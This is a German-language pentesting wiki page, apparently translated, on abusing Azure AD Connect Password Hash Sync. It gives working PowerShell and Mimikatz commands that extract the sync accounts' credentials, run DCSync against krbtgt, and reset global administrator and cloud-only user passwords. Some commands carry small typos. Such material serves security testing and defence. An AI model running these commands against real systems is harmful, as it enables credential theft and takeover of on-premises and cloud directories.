Az - PHS - Password Hash Sync

Grundinformationen

Aus den Dokumenten: Password Hash Synchronization ist eine der Anmeldemethoden, die verwendet werden, um hybride Identität zu erreichen. Azure AD Connect synchronisiert einen Hash, des Hashes, des Passworts eines Benutzers von einer lokalen Active Directory-Instanz zu einer cloudbasierten Azure AD-Instanz.

Es ist die häufigste Methode, die von Unternehmen verwendet wird, um ein lokales AD mit Azure AD zu synchronisieren.

Alle Benutzer und ein Hash der Passwort-Hashes werden vom lokalen AD zu Azure AD synchronisiert. Allerdings werden Klartext-Passwörter oder die ursprünglichen Hashes nicht an Azure AD gesendet. Darüber hinaus werden eingebaute Sicherheitsgruppen (wie Domänenadministratoren...) nicht mit Azure AD synchronisiert.

Die Hash-Synchronisation erfolgt alle 2 Minuten. Standardmäßig werden jedoch Passwortablauf und Kontenablauf nicht synchronisiert in Azure AD. Ein Benutzer, dessen lokales Passwort abgelaufen ist (nicht geändert), kann weiterhin auf Azure-Ressourcen mit dem alten Passwort zugreifen.

Wenn ein lokaler Benutzer auf eine Azure-Ressource zugreifen möchte, erfolgt die Authentifizierung in Azure AD.

PHS ist erforderlich für Funktionen wie Identity Protection und AAD-Domain-Services.

Pivotierung

Wenn PHS konfiguriert ist, werden einige privilegierte Konten automatisch erstellt:

• Das Konto MSOL_<installationID> wird automatisch im lokalen AD erstellt. Dieses Konto erhält eine Directory Synchronization Accounts-Rolle (siehe Dokumentation), was bedeutet, dass es Replikationsberechtigungen (DCSync) im lokalen AD hat.

• Ein Konto Sync_<name of on-prem ADConnect Server>_installationID wird in Azure AD erstellt. Dieses Konto kann das Passwort von ANY Benutzer (synchronisiert oder nur Cloud) in Azure AD zurücksetzen.

Die Passwörter der beiden vorherigen privilegierten Konten werden in einem SQL-Server auf dem Server gespeichert, auf dem Azure AD Connect installiert ist. Administratoren können die Passwörter dieser privilegierten Benutzer im Klartext extrahieren. Die Datenbank befindet sich in C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf.

Es ist möglich, die Konfiguration aus einer der Tabellen zu extrahieren, wobei eine verschlüsselt ist:

SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;

Die verschlüsselte Konfiguration ist mit DPAPI verschlüsselt und enthält die Passwörter des MSOL_* Benutzers im lokalen AD und das Passwort von Sync_* in AzureAD. Daher ist es möglich, durch das Kompromittieren dieser Privilegien auf das AD und AzureAD zuzugreifen.

Sie können eine vollständige Übersicht darüber, wie diese Anmeldeinformationen gespeichert und entschlüsselt werden, in diesem Vortrag finden.

Finden des Azure AD Connect-Servers

Wenn der Server, auf dem Azure AD Connect installiert ist, mit der Domäne verbunden ist (in den Dokumenten empfohlen), ist es möglich, ihn mit zu finden:

# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl

#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

Missbrauch von MSOL_*

# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Get-AADIntSyncCredentials

# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'

Missbrauch von Sync_*

Durch die Kompromittierung des Sync_* Kontos ist es möglich, das Passwort eines beliebigen Benutzers (einschließlich globaler Administratoren) zurückzusetzen.

# This command, run previously, will give us alse the creds of this account
Get-AADIntSyncCredentials

# Get access token for Sync_* account
$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache

# Get global admins
Get-AADIntGlobalAdmins

# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId

# Reset the users password
Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose

# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)

Es ist auch möglich, die Passwörter von nur Cloud-Benutzern zu ändern (auch wenn das unerwartet ist)

# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers

Es ist auch möglich, das Passwort dieses Benutzers zu dumpen.

Nahtloses SSO

Es ist möglich, nahtloses SSO mit PHS zu verwenden, das anfällig für andere Missbräuche ist. Überprüfen Sie es in:

Referenzen

• https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs

• https://aadinternals.com/post/on-prem_admin/

• https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf

• https://www.youtube.com/watch?v=xei8lAPitX8